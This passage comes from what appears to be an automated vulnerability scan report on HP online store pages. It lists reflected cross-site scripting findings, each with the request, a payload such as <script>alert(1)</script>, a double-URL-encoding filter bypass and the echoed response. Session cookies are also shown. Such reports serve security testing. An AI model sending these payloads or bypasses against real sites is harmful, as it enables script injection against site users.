2.16. https://hp.digitalriver.com/DRHM/store [paymentMethodFee%24%2456868 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hp.digitalriver.com
Path:	/DRHM/store

Issue detail

The value of the paymentMethodFee%24%2456868 request parameter is copied into the HTML document as plain text between tags. The payload acc28<script>alert(1)</script>0b94a75a2ccc8ebb1 was submitted in the paymentMethodFee%24%2456868 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /DRHM/store?Action=PostCheckoutPaymentQuickBuyCartPage&SiteID=hpappli&Locale=en_US&Form=com.digitalriver.template.form.CheckoutPaymentForm&CallingPageID=QuickBuyCartPage&Env=BASE&ORIG_VALUE_verazipInvalidAddress=&verazipInvalidAddress=&ORIG_VALUE_operation=update&operation=update&ORIG_VALUE_mode=anonymous&mode=anonymous&ORIG_VALUE_EMAILemail=&EMAILemail=&ORIG_VALUE_EMAILconfirmEmail=&EMAILconfirmEmail=&ORIG_VALUE_name1=&name1=&ORIG_VALUE_name2=&name2=&ORIG_VALUE_month=&month=&ORIG_VALUE_day=&day=&ORIG_VALUE_year=&year=&ORIG_VALUE_line1=&line1=&ORIG_VALUE_line2=&line2=&ORIG_VALUE_city=&city=&ORIG_VALUE_state=&state=&ORIG_VALUE_postalCode=&postalCode=&ORIG_VALUE_country=&country=&ORIG_VALUE_phoneNumber=&phoneNumber=&CLS_DATA_ANALYTICS=WO%3D300%26SO%3D300%26CO%3D300%26DST%3Dfalse&ORIG_VALUE_paymentMethodID%24%2456868=-1&paymentMethodID%24%2456868=-1&ORIG_VALUE_name%24%2456868=CreditCardMethod&name%24%2456868=CreditCardMethod&ORIG_VALUE_paymentMethodFee%24%2456868=&paymentMethodFee%24%2456868=acc28<script>alert(1)</script>0b94a75a2ccc8ebb1&ORIG_VALUE_pmtMethodValues%24%2456868=americanExpress%2CcarteBlanche%2CdinersClub%2Cdiscover%2CJCB%2CmasterCard%2Cvisa&pmtMethodValues%24%2456868=americanExpress%2CcarteBlanche%2CdinersClub%2Cdiscover%2CJCB%2CmasterCard%2Cvisa&ORIG_VALUE_paymentMethodID=-1&paymentMethodID=-1&ORIG_VALUE_cardNumber=&cardNumber=&ORIG_VALUE_cardExpirationMonth=&cardExpirationMonth=&ORIG_VALUE_cardExpirationYear=&cardExpirationYear=&ORIG_VALUE_cardSecurityCode=&cardSecurityCode=&saveMyCcEnabled=true&ORIG_VALUE_saveMyCc=on&saveMyCc=on&ORIG_VALUE_optIn=off&ORIG_VALUE_tosAccepted=off&x=22&y=8 HTTP/1.1
Host: hp.digitalriver.com
Connection: keep-alive
Referer: https://hp.digitalriver.com/store?Action=DisplayPage&Env=BASE&Locale=en_US&SiteID=hpappli&id=QuickBuyCartPage
Cache-Control: max-age=0
Origin: https://hp.digitalriver.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x2767i12d29vaf31; ORA_WX_SESSION="10.2.2.18:516-0#0"; JSESSIONID=730A178A040DADA09433BBF2D8444EEB; VISITOR_ID=971D4E8DFAED43675A1ADE2CBA2337E576BBC3593B03B8AB; BIGipServerp-drh-dc2pod8-pool1-active=302121482.516.0000; op638homepagegum=a00c00g00h276um0g631z079b; op638homepageliid=a00c00g00h276um0g631z079b; fcR=http%3A//burp/show/0; op_browser=safari_534.24; op_browserHigh=safari; op_os=windows; RefURL=http%3A%2F%2Fhp.digitalriver.com%2Fstore%2Fhpappli%2FDisplayHomePage%2F%3F3a310--%253E%253Cscript%253Ealert(document.location)%253C%2Fscript%253E458acdd922d%3D1; fcP=C=0&T=1309434815233&DTO=1309434815228&U=1313415981&V=1309434830029; fcPT=http%3A//hp.digitalriver.com/store%3FSiteID%3Dhpappli%26Action%3DDisplayProductDetailsPage%26productID%3D231257200%26OfferID%3D7468710109; fcC=X=C1313415981&Y=1309434830040&FV=10&H=1309434830029&Z=1&E=7371833&F=0&I=1309434833204

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=22307099937,0)
Date: Thu, 30 Jun 2011 12:06:45 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc2app83
Content-Length: 151364

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<p class="dr_paymentMethodFee_CreditCardMethod">*A acc28<script>alert(1)</script>0b94a75a2ccc8ebb1 processing fee will be charged when you use this payment method.</p>
...[SNIP]...

2.17. https://hp.digitalriver.com/DRHM/store [pmtMethodValues%24%2456868 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://hp.digitalriver.com
Path:	/DRHM/store

Issue detail

The value of the pmtMethodValues%24%2456868 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ac4f"><script>alert(1)</script>cfdf1e1c6355ba07 was submitted in the pmtMethodValues%24%2456868 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /DRHM/store?Action=PostCheckoutPaymentQuickBuyCartPage&SiteID=hpappli&Locale=en_US&Form=com.digitalriver.template.form.CheckoutPaymentForm&CallingPageID=QuickBuyCartPage&Env=BASE&ORIG_VALUE_verazipInvalidAddress=&verazipInvalidAddress=&ORIG_VALUE_operation=update&operation=update&ORIG_VALUE_mode=anonymous&mode=anonymous&ORIG_VALUE_EMAILemail=&EMAILemail=&ORIG_VALUE_EMAILconfirmEmail=&EMAILconfirmEmail=&ORIG_VALUE_name1=&name1=&ORIG_VALUE_name2=&name2=&ORIG_VALUE_month=&month=&ORIG_VALUE_day=&day=&ORIG_VALUE_year=&year=&ORIG_VALUE_line1=&line1=&ORIG_VALUE_line2=&line2=&ORIG_VALUE_city=&city=&ORIG_VALUE_state=&state=&ORIG_VALUE_postalCode=&postalCode=&ORIG_VALUE_country=&country=&ORIG_VALUE_phoneNumber=&phoneNumber=&CLS_DATA_ANALYTICS=WO%3D300%26SO%3D300%26CO%3D300%26DST%3Dfalse&ORIG_VALUE_paymentMethodID%24%2456868=-1&paymentMethodID%24%2456868=-1&ORIG_VALUE_name%24%2456868=CreditCardMethod&name%24%2456868=CreditCardMethod&ORIG_VALUE_paymentMethodFee%24%2456868=&paymentMethodFee%24%2456868=&ORIG_VALUE_pmtMethodValues%24%2456868=americanExpress%2CcarteBlanche%2CdinersClub%2Cdiscover%2CJCB%2CmasterCard%2Cvisa&pmtMethodValues%24%2456868=americanExpress%2CcarteBlanche%2CdinersClub%2Cdiscover%2CJCB%2CmasterCard%2Cvisa3ac4f"><script>alert(1)</script>cfdf1e1c6355ba07&ORIG_VALUE_paymentMethodID=-1&paymentMethodID=-1&ORIG_VALUE_cardNumber=&cardNumber=&ORIG_VALUE_cardExpirationMonth=&cardExpirationMonth=&ORIG_VALUE_cardExpirationYear=&cardExpirationYear=&ORIG_VALUE_cardSecurityCode=&cardSecurityCode=&saveMyCcEnabled=true&ORIG_VALUE_saveMyCc=on&saveMyCc=on&ORIG_VALUE_optIn=off&ORIG_VALUE_tosAccepted=off&x=22&y=8 HTTP/1.1
Host: hp.digitalriver.com
Connection: keep-alive
Referer: https://hp.digitalriver.com/store?Action=DisplayPage&Env=BASE&Locale=en_US&SiteID=hpappli&id=QuickBuyCartPage
Cache-Control: max-age=0
Origin: https://hp.digitalriver.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x2767i12d29vaf31; ORA_WX_SESSION="10.2.2.18:516-0#0"; JSESSIONID=730A178A040DADA09433BBF2D8444EEB; VISITOR_ID=971D4E8DFAED43675A1ADE2CBA2337E576BBC3593B03B8AB; BIGipServerp-drh-dc2pod8-pool1-active=302121482.516.0000; op638homepagegum=a00c00g00h276um0g631z079b; op638homepageliid=a00c00g00h276um0g631z079b; fcR=http%3A//burp/show/0; op_browser=safari_534.24; op_browserHigh=safari; op_os=windows; RefURL=http%3A%2F%2Fhp.digitalriver.com%2Fstore%2Fhpappli%2FDisplayHomePage%2F%3F3a310--%253E%253Cscript%253Ealert(document.location)%253C%2Fscript%253E458acdd922d%3D1; fcP=C=0&T=1309434815233&DTO=1309434815228&U=1313415981&V=1309434830029; fcPT=http%3A//hp.digitalriver.com/store%3FSiteID%3Dhpappli%26Action%3DDisplayProductDetailsPage%26productID%3D231257200%26OfferID%3D7468710109; fcC=X=C1313415981&Y=1309434830040&FV=10&H=1309434830029&Z=1&E=7371833&F=0&I=1309434833204

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=22307108433,0)
Date: Thu, 30 Jun 2011 12:06:53 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc2app83
Content-Length: 151203

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/hpappli/hpappliSI/version/83/images/visa3ac4f"><script>alert(1)</script>cfdf1e1c6355ba07.gif" id="dr_visa3ac4f"><script>alert(1)</script>cfdf1e1c6355ba07" alt="visa3ac4f">
...[SNIP]...

2.18. https://hp.digitalriver.com/store [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://hp.digitalriver.com
Path:	/store

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload c0020-->dd459b0ac92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store?Action=DisplayPage&Env=BASE&Locale=en_US&SiteID=hpappli&id=QuickBuyCartPage&c0020-->dd459b0ac92=1 HTTP/1.1
Host: hp.digitalriver.com
Connection: keep-alive
Referer: http://hp.digitalriver.com/store?SiteID=hpappli&Action=DisplayProductDetailsPage&productID=231257200&OfferID=7468710109
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op537homegum=a00602v02x2767i12d29vaf31; ORA_WX_SESSION="10.2.2.18:516-0#0"; JSESSIONID=730A178A040DADA09433BBF2D8444EEB; VISITOR_ID=971D4E8DFAED43675A1ADE2CBA2337E576BBC3593B03B8AB; BIGipServerp-drh-dc2pod8-pool1-active=302121482.516.0000; op638homepagegum=a00c00g00h276um0g631z079b; op638homepageliid=a00c00g00h276um0g631z079b; fcR=http%3A//burp/show/0; op_browser=safari_534.24; op_browserHigh=safari; op_os=windows; RefURL=http%3A%2F%2Fhp.digitalriver.com%2Fstore%2Fhpappli%2FDisplayHomePage%2F%3F3a310--%253E%253Cscript%253Ealert(document.location)%253C%2Fscript%253E458acdd922d%3D1; fcP=C=0&T=1309434815233&DTO=1309434815228&U=1313415981&V=1309434830029; fcPT=http%3A//hp.digitalriver.com/store%3FSiteID%3Dhpappli%26Action%3DDisplayProductDetailsPage%26productID%3D231257200%26OfferID%3D7468710109; fcC=X=C1313415981&Y=1309434830040&FV=10&H=1309434830029&Z=1&E=7371833&F=0&I=1309434833204

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=22306416487,0)
Date: Thu, 30 Jun 2011 11:55:37 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc2app83
Content-Length: 149428

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
dd459b0ac92=1&ceid=173881400&cename=TopHeader&id=QuickBuyCartPage"-->
...[SNIP]...

2.19. http://www.shopping.hp.com/accessories-store/computer [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.shopping.hp.com
Path:	/accessories-store/computer

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cfb99%2527%253b1cc57a1448c was submitted in the REST URL parameter 2. This input was echoed as cfb99';1cc57a1448c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /accessories-store/computercfb99%2527%253b1cc57a1448c HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:52 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkuidme2AJ%2BNC%2FouVHddwea0ic%3D; expires=Friday, 28-Oct-2011 12:15:53 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:53 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<style type="text/css">
.NewMpss{float
...[SNIP]...
<landing||1|;;;>

var s_prop21 = 'computercfb99';1cc57a1448c||1|';

var jump_id = 'null';

if (jump_id != 'ex_r602_go/touchsmart' && jump_id != 'ex_r602_info/e-center-p') {
var s_prop4 = jump_id + '|';
}

//Script added to introduce Ne
...[SNIP]...

2.20. http://www.shopping.hp.com/accessories-store/handheld [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.shopping.hp.com
Path:	/accessories-store/handheld

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6803%2527%253bd9e74eaec78 was submitted in the REST URL parameter 2. This input was echoed as d6803';d9e74eaec78 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /accessories-store/handheldd6803%2527%253bd9e74eaec78 HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:55 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkvgt6W3A59NyDislPWcwGe0ic%3D; expires=Friday, 28-Oct-2011 12:15:55 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:55 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<style type="text/css">
.NewMpss{float
...[SNIP]...
<landing||1|;;;>

var s_prop21 = 'handheldd6803';d9e74eaec78||1|';

var jump_id = 'null';

if (jump_id != 'ex_r602_go/touchsmart' && jump_id != 'ex_r602_info/e-center-p') {
var s_prop4 = jump_id + '|';
}

//Script added to introduce Ne
...[SNIP]...

2.21. http://www.shopping.hp.com/accessories-store/printer [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.shopping.hp.com
Path:	/accessories-store/printer

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e76d7%2527%253b6dbdacc7b84 was submitted in the REST URL parameter 2. This input was echoed as e76d7';6dbdacc7b84 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /accessories-store/printere76d7%2527%253b6dbdacc7b84 HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:51 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkqgt2S3QxwMSjvvVvceQyZm2vi; expires=Friday, 28-Oct-2011 12:15:52 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:52 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<style type="text/css">
.NewMpss{float
...[SNIP]...
<landing||1|;;;>

var s_prop21 = 'printere76d7';6dbdacc7b84||1|';

var jump_id = 'null';

if (jump_id != 'ex_r602_go/touchsmart' && jump_id != 'ex_r602_info/e-center-p') {
var s_prop4 = jump_id + '|';
}

//Script added to introduce Ne
...[SNIP]...

2.22. http://www.shopping.hp.com/accessories-store/scanner [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.shopping.hp.com
Path:	/accessories-store/scanner

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 484b2%2527%253b9e9bd6fd355 was submitted in the REST URL parameter 2. This input was echoed as 484b2';9e9bd6fd355 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /accessories-store/scanner484b2%2527%253b9e9bd6fd355 HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:55 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkvjdCe3wlxMivvvFHcdwSYm2vi; expires=Friday, 28-Oct-2011 12:15:55 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:55 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<style type="text/css">
.NewMpss{float
...[SNIP]...
<landing||1|;;;>

var s_prop21 = 'scanner484b2';9e9bd6fd355||1|';

var jump_id = 'null';

if (jump_id != 'ex_r602_go/touchsmart' && jump_id != 'ex_r602_info/e-center-p') {
var s_prop4 = jump_id + '|';
}

//Script added to introduce Ne
...[SNIP]...

2.23. http://www.shopping.hp.com/accessories-store/touchpad [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.shopping.hp.com
Path:	/accessories-store/touchpad

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c28e7%2527%253b5661261eee9 was submitted in the REST URL parameter 2. This input was echoed as c28e7';5661261eee9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /accessories-store/touchpadc28e7%2527%253b5661261eee9 HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:54 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkvitqS3Qt6NC3ss1fWeAec0ic%3D; expires=Friday, 28-Oct-2011 12:15:54 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:54 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<style type="text/css">
.NewMpss{float
...[SNIP]...
<landing||1|;;;>

var s_prop21 = 'touchpadc28e7';5661261eee9||1|';

var jump_id = 'null';

if (jump_id != 'ex_r602_go/touchsmart' && jump_id != 'ex_r602_info/e-center-p') {
var s_prop4 = jump_id + '|';
}

//Script added to introduce Ne
...[SNIP]...

2.24. http://www.shopping.hp.com/can/computer/categories/ac_adapters/1/accessories [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/ac_adapters/1/accessories

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 979d5%2522%2520a%253db%25200476e8a9340 was submitted in the REST URL parameter 5. This input was echoed as 979d5" a=b 0476e8a9340 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /can/computer/categories/ac_adapters/1979d5%2522%2520a%253db%25200476e8a9340/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 15:00:19 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: HHOJSID=N4j4TMPDJKhP0y31cLMzQJZtB1tPg1L2dFG3svYh2FjTQ9Q4vHfx!-588465799; expires=Friday, 01-Jul-2011 15:00:19 GMT; path=/
Set-Cookie: hpshopping=1&user_id=mlkpgt2U2Ap9Myrrvlrccwyd0ic%3D; expires=Friday, 28-Oct-2011 15:00:19 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 15:00:19 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...
<input type="hidden" name="nextPage" value="/product_detail.do?storeName=accessories&landing=computer&category=categories&subcat1=ac_adapters&catLevel=1979d5" a=b 0476e8a9340&mc=&product_code=DR912A%23ABA&tab=&fromPage=/shopping/can.do">
...[SNIP]...

2.25. http://www.shopping.hp.com/can/computer/categories/ac_adapters/2/accessories [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/ac_adapters/2/accessories

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4a25%2522%2520a%253db%25201fa6aebdb9e was submitted in the REST URL parameter 5. This input was echoed as e4a25" a=b 1fa6aebdb9e in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /can/computer/categories/ac_adapters/2e4a25%2522%2520a%253db%25201fa6aebdb9e/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 15:00:17 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: HHOJSID=qGFKTMPDm0lvQtlCBPfGfpYrpXplmhw76vXGDsd040hJ3p65JGXB!-588465799; expires=Friday, 01-Jul-2011 15:00:19 GMT; path=/
Set-Cookie: hpshopping=1&user_id=mlkijNmU2Qh%2FOi7pu1PZcwCY0ic%3D; expires=Friday, 28-Oct-2011 15:00:19 GMT; path=/
